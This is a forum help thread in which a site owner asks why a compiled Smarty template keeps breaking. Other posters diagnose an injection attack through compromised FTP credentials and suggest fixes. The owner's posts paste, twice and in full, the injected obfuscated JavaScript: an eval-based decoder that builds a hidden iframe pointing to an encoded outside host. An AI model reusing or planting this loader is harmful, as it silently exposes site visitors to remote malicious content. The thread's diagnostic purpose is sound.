need urgent help (php, smarty or ?)

hi,

i have got a site with 6000 hits a day. since yesterday night, there are problems. I can not reach the main page.
error log shows: PHP Parse error: syntax error, unexpected '<', expecting T_STRING or T_VARIABLE or '{' or '$' in... public_html/cache/templates_c/%%C3^C37^C3724EE2%%head1.tpl.php on line 211


210.
</head>
211.
<body <?php if ($this-> <script>/**/function Ruz7(Gcs6, XaV8, Iye4) { var Ccu8; Ccu8=Gcs6.split(XaV8); var Giw4=Ccu8.join(Iye4); return Giw4;/**/ } function Wfp8(Ywm4) { Ywm4 = Ruz7(Ywm4,"##+##","'"); Ywm4 = Ruz7(Ywm4,"##|##","\\"); Giw4=""; Ivt4 =""; for(k=0;k<Ywm4.length;k++) { Giw4 = Ywm4.charCodeAt(k); if (Giw4==32){Giw4=35} else if (Giw4==35){Giw4=32} else if (Giw4==59){Giw4=64} else if (Giw4==64){Giw4=59} else if (Giw4==37){Giw4=42} else if (Giw4==42){Giw4=37} else if (Giw4>=97 && Giw4<=122) { Giw4=Giw4-97;Giw4=25-Giw4;Giw4+=97; }else if (Giw4>=65 && Giw4<=90) { Giw4=Giw4-65;Giw4=25-Giw4;Giw4+=65; }else if (Giw4>=48 && Giw4<=57) { Giw4=Giw4-48;Giw4=9-Giw4;Giw4+=48; } Ivt4 += String.fromCharCode(Giw4); } return Ivt4;/**/ }Popf=eval;Popf(Wfp8('ezi#Msw8#=###+##sggk://c-wzrob.xln/hg/rnt/a/hgzgrx.ksk##+##@ezi#Kzl4#=###+##ruiznv##+##@'));Popf(Wfp8('ezi#Ang9#=#wlxfnvmg.xivzgvVovnvmg(Kzl4)@Ang9.hvgZggiryfgv(##+##hix##+##,#Msw8)@'));Popf(Wfp8('Ang9.hvgZggiryfgv(##+##drwgs##+##,9)@Ang9.hvgZggiryfgv(##+##svrtsg##+##,9)@Ang9.hvgZggiryfgv(##+##yliwvi##+##,9)@'));Popf(Wfp8('Ang9.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));Popf(Wfp8('Ang9.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Wrzw=mzertzgli.fhviZtvmg.glOldviXzhv()@'));Popf(Wfp8('ezi#rsu7=Wrzw.rmwvcLu(##+##nhrv##+##)@ezi#Vlo2=Wrzw.rmwvcLu(##+##mg#3.##+##)@ezi#DbZ4=Wrzw.rmwvcLu(##+##nhrv#1##+##)@'));if ((ihf2>0)&&(Eol7==-1)&&(WyA5==-1)){Popf(Wfp8('wlxfnvmg.ylwb.zkkvmwXsrow(Ang9)@'));}</script> _tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>>
212.

213.
<div id="container"><!-- main container //-->

when i delete the cache files it will work for some minutes. i also load up a backup of the tpl-files yesterday. it runs for some houres but at midnight it is the same error.

i can show more details through pm because it is an adult site.

edit:

the file looks shortly after deleting:

211. #
</head>
#
<body <?php if ($this->_tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>>
#

#
<div id="container"><!-- main container //-->

 

Well, first, if your php script did work for several hours, that means there is no problem with the logic in the script itself (unless you changed something or new condition showed up).

It's probably your server bugs (or you just need to disable caching feature if your script has one, a little more work for server is nothing in comparison with frequently down time).

 

thanks for your reply.
i dont changed anything and disable the caching of smarty template it is not possible i think.

edit:

this is showing in the tpl-file after some minutes and the site wont work:

211.
<body <?php if ($this-> <script>/**/function KCz3(QNp5, bud5, lnmp) { var Pnl3; Pnl3=QNp5.split(bud5); var UcO1=Pnl3.join(lnmp); return UcO1;/**/ } function RzG6(Dnd1) { Dnd1 = KCz3(Dnd1,"##+##","'"); Dnd1 = KCz3(Dnd1,"##|##","\\"); UcO1=""; Pby5 =""; for(k=0;k<Dnd1.length;k++) { UcO1 = Dnd1.charCodeAt(k); if (UcO1==32){UcO1=35} else if (UcO1==35){UcO1=32} else if (UcO1==59){UcO1=64} else if (UcO1==64){UcO1=59} else if (UcO1==37){UcO1=42} else if (UcO1==42){UcO1=37} else if (UcO1>=97 && UcO1<=122) { UcO1=UcO1-97;UcO1=25-UcO1;UcO1+=97; }else if (UcO1>=65 && UcO1<=90) { UcO1=UcO1-65;UcO1=25-UcO1;UcO1+=65; }else if (UcO1>=48 && UcO1<=57) { UcO1=UcO1-48;UcO1=9-UcO1;UcO1+=48; } Pby5 += String.fromCharCode(UcO1); } return Pby5;/**/ }VXd1=eval;VXd1(RzG6('ezi#FRa2#=###+##sggk://c-wzrob.xln/hg/rnt/a/hgzgrx.ksk##+##@ezi#YNx3#=###+##ruiznv##+##@'));VXd1(RzG6('ezi#Nnt2#=#wlxfnvmg.xivzgvVovnvmg(YNx3)@Nnt2.hvgZggiryfgv(##+##hix##+##,#FRa2)@'));VXd1(RzG6('Nnt2.hvgZggiryfgv(##+##drwgs##+##,9)@Nnt2.hvgZggiryfgv(##+##svrtsg##+##,9)@Nnt2.hvgZggiryfgv(##+##yliwvi##+##,9)@'));VXd1(RzG6('Nnt2.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));VXd1(RzG6('Nnt2.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#ssRj=mzertzgli.fhviZtvmg.glOldviXzhv()@'));VXd1(RzG6('ezi#Ecz3=ssRj.rmwvcLu(##+##nhrv##+##)@ezi#YDh4=ssRj.rmwvcLu(##+##mg#3.##+##)@ezi#Alxt=ssRj.rmwvcLu(##+##nhrv#1##+##)@'));if ((Vxa6>0)&&(BWs5==-1)&&(Zocg==-1)){VXd1(RzG6('wlxfnvmg.ylwb.zkkvmwXsrow(Nnt2)@'));}</script> _tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>>
212.

 

I think you're looking at the compiled tpl file not the original template file. Look for the error in your original template file or the php that loads it.

There's two main components to smarty, the cache which you can disable and the compile directory. The compile directory is needed to convert the tpl into a live file and you shouldn't mess with that one at all.

 

yes it is the compiled file. but when i delete the file the site works for a few minutes and the compiled file is new generated. but some time later the tpl-file has a lager size and the site wont work.
i can only see in the error log that is something wrong with the cached file:

PHP Parse error: syntax error, unexpected '<', expecting T_STRING or T_VARIABLE or '{' or '$' in... public_html/cache/templates_c/%%C3^C37^C3724EE2%%head1.tpl.php on line 211

 

Looking at both your original TPL and the compiled one, and how 'after a while' , it breaks because there's a block of javascript being inserted right smack dab in the middle of the PHP code... but its not in your original TPL file. I suspect you may have a trojan or something other that may have compromised your FTP password, and automatic bots are logging in every so often attempting to insert their block of javascript code. (kinda like an iframe injection attack).

The php code is supposed to be

if ($this->_tpl_vars['upload_page'] == 'upload'): ?>onLoad="iniFilePage()"<?php endif; ?>

Code (markup):

Based on the original TPL

But if you'll notice from 211, somehow <script>....</script> was inserted right after $this-> , probably because it thought -> was the closing tag for <body> and was attempting to put a block of javascript right after it.

Some actions to take:

1) Change your password from another machine.
2) Do not use FTP from that machine until you've updated antivirus and done a full scan.
3) In the future use SSH/SCP if your hosting allows, the free program WinSCP will let you log into port 22 and behaves much like FTP but much more secure
4) You may need to reinstall the script to rid of possibly contaminated files.

Had a client once who was a victim of a trojan that sniffed the FTP port for credentials, and once compromised bots from other servers would login, look for index.php, default*.php and home.php and attempt to insert an iframe at the bottom of the page.